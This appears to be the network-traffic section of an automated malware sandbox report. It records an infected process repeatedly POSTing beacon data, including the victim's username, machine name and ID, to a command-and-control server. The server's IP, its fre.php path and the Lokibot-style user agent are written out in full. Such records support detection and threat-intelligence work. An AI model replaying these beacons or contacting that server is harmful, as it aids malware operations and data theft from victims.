                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087644100 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087660074 CEST672INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087677956 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087694883 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087703943 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087718964 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087735891 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087775946 CEST1060INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.093305111 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.224917194.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:25.852368116 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 176
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:25.857785940 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: 'ckav.ruAlbus116938ALBUS-PCk0DE4229FCF97F5879F50F8FD3Sii92
                                                                                              Oct 24, 2024 21:23:26.884572029 CEST228INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:26 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 15
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.224917294.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:27.161587000 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 176
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:27.167849064 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: 'ckav.ruAlbus116938ALBUS-PC+0DE4229FCF97F5879F50F8FD3UiEbj
                                                                                              Oct 24, 2024 21:23:29.808551073 CEST228INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 15
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.224917394.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:29.877360106 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:29.882996082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:30.931631088 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.224917494.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:31.079195023 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:31.085553885 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:32.518603086 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.224917594.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:32.712872982 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:32.718723059 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:33.891859055 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.
                                                                                              Oct 24, 2024 21:23:34.305427074 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.
                                                                                              Oct 24, 2024 21:23:34.306662083 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.224917694.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:34.313005924 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:34.319093943 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:36.394407034 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.224917794.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:36.544878006 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:36.550345898 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:37.743582964 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:37 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.224917894.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:37.883402109 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:37.888748884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:38.952395916 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:38 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.224917994.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:39.088957071 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:39.094383955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:40.185728073 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.224918094.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:40.346195936 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:40.351612091 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:41.449007034 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:41 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.224918194.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:41.632150888 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:41.637883902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:42.717688084 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.224918294.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:42.898226023 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:42.903712988 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
